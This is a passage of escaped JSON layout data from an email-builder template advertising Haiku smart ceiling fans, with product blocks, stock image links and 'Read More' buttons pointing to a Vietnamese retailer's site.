10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#c97a14\\\",\\\"textAlign\\\":\\\"right\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_2\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-family: \'Crimson Text\', serif; font-size: 14px; line-height: 19.6px;\\\\\\\"><strong><span style=\\\\\\\"font-size: 14px; line-height: 19.6px;\\\\\\\"><span style=\\\\\\\"font-size: 34px; line-height: 47.6px;\\\\\\\">H E L L O<\\/span><\\/span><\\/strong><\\/span><\\/p>\\\\n<p style=\\\\\\\"line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-family: \'Crimson Text\', serif; line-height: 19.6px;\\\\\\\"><span style=\\\\\\\"font-size: 34px; line-height: 47.6px;\\\\\\\"><strong>HAIKU SMART FANS<\\/strong><\\/span><\\/span><\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_4\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{\\\"borderTopColor\\\":\\\"#CCC\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopWidth\\\":\\\"0px\\\",\\\"borderLeftColor\\\":\\\"#CCC\\\",\\\"borderLeftStyle\\\":\\\"solid\\\",\\\"borderLeftWidth\\\":\\\"0px\\\",\\\"borderRightColor\\\":\\\"#a5a5a5\\\",\\\"borderRightStyle\\\":\\\"solid\\\",\\\"borderRightWidth\\\":\\\"2px\\\",\\\"borderBottomColor\\\":\\\"#CCC\\\",\\\"borderBottomStyle\\\":\\\"solid\\\",\\\"borderBottomWidth\\\":\\\"0px\\\"},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}},{\\\"id\\\":\\\"55FclmztDX\\\",\\\"contents\\\":[{\\\"id\\\":\\\"88IAIus72W\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"25px 30px 10px 20px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#a5a5a5\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_3\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\">You deserve a ceiling fan that adds to the beauty of your home and makes your life simpler. Handcrafted with premium materials and engineered with cutting-edge smart home technology, Haiku represents the pinnacle in style and innovation for ceiling fans. More than 75 international awards attest to its quality, while its world-leading efficiency makes it the perfect choice for energy-conscious homeowners.<\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"lE-11Qb1fk\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 30px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/haiku.hogiaphat.vn\\\",\\\"target\\\":\\\"_blank\\\"},\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#FFFFFF\\\",\\\"backgroundColor\\\":\\\"#c97a14\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"10px 20px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_5\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<span style=\\\\\\\"line-height: 16.8px;\\\\\\\">Read More Haiku Fans<\\/span>\\\",\\\"hideMobile\\\":false,\\\"calculatedWidth\\\":197,\\\"calculatedHeight\\\":37}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_5\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#f9f9f9\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_4\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"bXYUs1ZZby\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"eo9KgENRVd\\\",\\\"contents\\\":[{\\\"id\\\":\\\"ZrgjmhET6A\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"57%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"2px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#b6b6b6\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"10px 10px 40px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_2\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_6\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#f9f9f9\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_5\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"Qg-SXxpaDY\\\",\\\"cells\\\":[1,1,1],\\\"columns\\\":[{\\\"id\\\":\\\"UXSjOILEvr\\\",\\\"contents\\\":[{\\\"id\\\":\\\"8dX0_u_8tj\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 7px 10px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677122542378-h-1.jpg\\\",\\\"width\\\":300,\\\"height\\\":400,\\\"maxWidth\\\":\\\"80%\\\",\\\"autoWidth\\\":false},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_2\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"_override\\\":{\\\"mobile\\\":{\\\"src\\\":{\\\"maxWidth\\\":\\\"60%\\\",\\\"autoWidth\\\":false}}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"skewsIpeLi\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 20px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#727171\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_4\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\">Haiku 84 inch - Moso Bambo Airfoils<\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"KOgit-NOV8\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-haiku-84inch\\\",\\\"target\\\":\\\"_blank\\\"},\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#FFFFFF\\\",\\\"backgroundColor\\\":\\\"#3AAEE0\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"10px 20px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"4px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_7\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<span style=\\\\\\\"line-height: 16.8px;\\\\\\\">Read More<\\/span>\\\",\\\"calculatedWidth\\\":116,\\\"calculatedHeight\\\":37}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_3\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}},{\\\"id\\\":\\\"MfSqUJVgi_\\\",\\\"contents\\\":[{\\\"id\\\":\\\"AIbp_n7pPt\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 0px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677122670015-h-2.jpg\\\",\\\"width\\\":300,\\\"height\\\":400,\\\"maxWidth\\\":\\\"75%\\\",\\\"autoWidth\\\":false},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_3\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"_override\\\":{\\\"mobile\\\":{\\\"src\\\":{\\\"maxWidth\\\":\\\"60%\\\",\\\"autoWidth\\\":false}}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"bNQDqVjJ3i\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 20px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#727171\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_8\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\">Haiku 52\\/60 inch - Moso Bambo Airfoils<\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"0BjtWYcC8m\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-haiku-h\\\",\\\"target\\\":\\\"_blank\\\"},\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#FFFFFF\\\",\\\"backgroundColor\\\":\\\"#3AAEE0\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"10px 20px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"4px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_6\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<span style=\\\\\\\"line-height: 16.8px;\\\\\\\">Read More<\\/span>\\\",\\\"calculatedWidth\\\":116,\\\"calculatedHeight\\\":37}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_8\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}},{\\\"id\\\":\\\"luDxDjahZP\\\",\\\"contents\\\":[{\\\"id\\\":\\\"rVoAcsE_jW\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 10px 8px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677122680334-h-3.jpg\\\",\\\"width\\\":300,\\\"height\\\":400,\\\"maxWidth\\\":\\\"80%\\\",\\\"autoWidth\\\":false},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_4\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"_override\\\":{\\\"mobile\\\":{\\\"src\\\":{\\\"maxWidth\\\":\\\"60%\\\",\\\"autoWidth\\\":false}}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"R1O7b90Czm\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 20px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#727171\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_6\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\">Essence - Aluminium Airfoils<\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"3wkg87TRYe\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/hogiaphat.vn\\/essence\\\",\\\"target\\\":\\\"_blank\\\"},\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#FFFFFF\\\",\\\"backgroundColor\\\":\\\"#3AAEE0\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"10px 20px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"4px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_8\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<span style=\\\\\\\"line-height: 16.8px;\\\\\\\">Read More<\\/span>\\\",\\\"calculatedWidth\\\":116,\\\"calculatedHeight\\\":37}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_9\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#f9f9f9\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_3\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"GOL31FaRLf\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"hwbTiM3Utx\\\",\\\"contents\\\":[{\\\"id\\\":\\\"oMjfj_SbVL\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677296773906-login_customers.jpg\\\",\\\"width\\\":1920,\\\"height\\\":1080},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_9\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"TVD-E1BXTh\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"25px 0px 0px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1607002000922-vvb.png\\\",\\\"width\\\":600,\\\"height\\\":48},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_5\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_11\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#f9f9f9\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_8\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"em1-YlvAoX\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"_fkVaQ2PEN\\\",\\\"contents\\\":[{\\\"id\\\":\\\"wLx5W-qwDc\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677122312096-haiku-logo.png\\\",\\\"width\\\":718,\\\"height\\\":185},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_6\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"qZBv269hpu\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 20px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#ffffff\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_10\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\">No fan manufacturer goes to greater lengths to create energy-efficient products than Big Ass Fans. It\\u2019s why businesses worldwide use our fans to cut heating and cooling costs by up to 30% and why designers rely on our ENERGY STAR\\u00ae-rated ceiling fan models to meet the growing demand for sustainable, LEED-certified projects.<\\/p>\\\",\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_10\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#cc7202\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_7\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"ilEcft3K21\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"KQFvi5e5Kf\\\",\\\"contents\\\":[{\\\"id\\\":\\\"VqJpOx53SF\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"0px 0px 